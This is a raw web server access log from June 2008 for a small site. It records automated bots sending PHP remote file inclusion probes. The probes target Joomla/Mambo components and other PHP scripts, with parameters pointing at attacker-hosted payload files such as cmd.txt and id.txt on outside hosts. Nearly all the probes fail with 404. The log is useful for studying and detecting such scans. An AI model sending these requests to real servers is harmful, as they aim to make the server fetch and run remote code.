203.237.236.11 - - [22/Jun/2008:17:00:28 -0700] "GET /logs/access_080128.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.neighborhoodglimpses.com"
212.227.251.172 - - [22/Jun/2008:17:01:16 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.227.251.172 - - [22/Jun/2008:17:04:39 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.227.251.172 - - [22/Jun/2008:17:05:14 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.117.241.196 - - [22/Jun/2008:17:06:10 -0700] "GET /logs/access_080211.log/lostpasswd.php?env[include_prefix]=http://binbrain.com/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.117.241.196 - - [22/Jun/2008:17:06:10 -0700] "GET /lostpasswd.php?env[include_prefix]=http://binbrain.com/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.117.241.196 - - [22/Jun/2008:17:06:12 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://binbrain.com/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
190.196.13.90 - - [22/Jun/2008:17:07:21 -0700] "GET /logs/middle.php?file=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
190.196.13.90 - - [22/Jun/2008:17:07:21 -0700] "GET /middle.php?file=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
208.43.113.99 - - [22/Jun/2008:17:07:30 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
208.43.113.99 - - [22/Jun/2008:17:07:30 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
202.181.105.117 - - [22/Jun/2008:17:08:56 -0700] "GET /logs/access_080414.log//templates/mangobery/footer.sample.php?Site_Path=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [22/Jun/2008:17:08:56 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [22/Jun/2008:17:08:57 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [22/Jun/2008:17:09:23 -0700] "GET /logs/access_080225.log//templates/mangobery/footer.sample.php?Site_Path=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [22/Jun/2008:17:09:23 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [22/Jun/2008:17:09:24 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
80.67.24.2 - - [22/Jun/2008:17:17:03 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
80.67.24.2 - - [22/Jun/2008:17:17:03 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
202.179.0.195 - - [22/Jun/2008:17:18:27 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.neighborhoodglimpses.com"
202.179.0.195 - - [22/Jun/2008:17:18:30 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.neighborhoodglimpses.com"
89.108.91.166 - - [22/Jun/2008:17:21:54 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
89.108.91.166 - - [22/Jun/2008:17:21:54 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
89.108.91.166 - - [22/Jun/2008:17:21:54 -0700] "GET /logs/access_080211.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
212.193.226.112 - - [22/Jun/2008:17:23:10 -0700] "GET /logs/access_080211.log/bookmark4u/lostpasswd.php?env[include_prefix]=:http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
212.193.226.112 - - [22/Jun/2008:17:23:10 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=:http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
212.193.226.112 - - [22/Jun/2008:17:23:11 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=:http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
212.193.226.112 - - [22/Jun/2008:17:23:16 -0700] "GET /logs/access_080211.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
212.193.226.112 - - [22/Jun/2008:17:23:21 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.181.105.117 - - [22/Jun/2008:17:23:22 -0700] "GET /logs/access.log/index.php?pag=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [22/Jun/2008:17:23:22 -0700] "GET /index.php?pag=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [22/Jun/2008:17:23:22 -0700] "GET /logs/index.php?pag=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:17:24:05 -0700] "GET //rgboard/include/bbs.lib.inc.php?site_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:17:27:45 -0700] "GET /logs/access_080211.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:17:27:45 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:17:27:47 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
201.217.93.91 - - [22/Jun/2008:17:28:31 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.camerasreview.org/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
201.217.93.91 - - [22/Jun/2008:17:28:32 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.camerasreview.org/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
87.248.169.14 - - [22/Jun/2008:17:30:34 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.neighborhoodglimpses.com"
64.191.40.213 - - [22/Jun/2008:17:32:18 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://webhosting.i2.co.id/mestre101/list.jpg?.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "neighborhoodglimpses.com"
64.191.40.213 - - [22/Jun/2008:17:32:18 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://busca.uol.com.br/uol/index.html? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:17:38:01 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://membres.lycos.fr/youyoussniper/scaner/ishi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:17:38:02 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://membres.lycos.fr/youyoussniper/scaner/ishi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:46:33 -0700] "GET /logs/access_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:46:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:46:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:17:46:58 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.34.164.227 - - [22/Jun/2008:17:46:58 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:48:52 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:49:13 -0700] "GET /logs/access_071217.log/send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:49:14 -0700] "GET /send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:49:14 -0700] "GET /logs/send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:49:18 -0700] "GET /logs/access_080128.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../idv.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:49:19 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../idv.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:49:21 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../idv.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:49:31 -0700] "GET /logs/access_080107.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../idv.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:49:31 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../idv.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:49:33 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../idv.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:17:50:42 -0700] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:17:50:42 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:17:50:42 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:17:51:09 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:51:22 -0700] "GET /send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:52:25 -0700] "GET /logs/send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:52:25 -0700] "GET /send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.93.62.112 - - [22/Jun/2008:17:52:45 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.93.62.112 - - [22/Jun/2008:17:52:45 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:53:50 -0700] "GET /logs/access_080128.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:53:50 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:53:50 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:17:53:55 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:54:12 -0700] "GET /logs/access_080107.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:54:13 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
207.36.232.125 - - [22/Jun/2008:17:54:13 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
202.179.0.195 - - [22/Jun/2008:17:54:51 -0700] "GET /logs/access_080211.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "neighborhoodglimpses.com"
202.179.0.195 - - [22/Jun/2008:17:54:55 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "neighborhoodglimpses.com"
202.179.0.195 - - [22/Jun/2008:17:54:58 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "neighborhoodglimpses.com"
64.22.89.194 - - [22/Jun/2008:17:57:50 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
64.22.89.194 - - [22/Jun/2008:17:57:51 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
64.22.89.194 - - [22/Jun/2008:17:57:51 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:17:59:15 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:17:59:15 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:17:59:15 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.203.228.120 - - [22/Jun/2008:17:59:31 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
213.203.228.120 - - [22/Jun/2008:17:59:31 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:17:59:48 -0700] "GET /send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:18:01:43 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:18:01:46 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:18:02:31 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.223.106.116 - - [22/Jun/2008:18:02:31 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
80.67.25.167 - - [22/Jun/2008:18:04:06 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
80.67.25.167 - - [22/Jun/2008:18:04:07 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:18:05:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:18:10:18 -0700] "GET /logs/access_080225.log/send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:18:10:18 -0700] "GET /send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:18:10:19 -0700] "GET /logs/send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.179.0.195 - - [22/Jun/2008:18:12:02 -0700] "GET /logs/access_080211.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "neighborhoodglimpses.com"
202.179.0.195 - - [22/Jun/2008:18:12:05 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "neighborhoodglimpses.com"
202.179.0.195 - - [22/Jun/2008:18:12:09 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:18:12:15 -0700] "GET /logs/send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.68.56 - - [22/Jun/2008:18:12:17 -0700] "GET /send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
222.124.143.236 - - [22/Jun/2008:18:24:18 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
222.124.143.236 - - [22/Jun/2008:18:24:19 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:18:27:42 -0700] "GET /logs/access.log//rgboard/include/bbs.lib.inc.php?site_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:18:27:42 -0700] "GET //rgboard/include/bbs.lib.inc.php?site_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.34.226.62 - - [22/Jun/2008:18:27:43 -0700] "GET /logs//rgboard/include/bbs.lib.inc.php?site_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
59.188.5.164 - - [22/Jun/2008:18:28:07 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
59.188.5.164 - - [22/Jun/2008:18:28:08 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
195.12.53.176 - - [22/Jun/2008:18:38:08 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.neighborhoodglimpses.com"
87.106.18.76 - - [22/Jun/2008:18:47:12 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
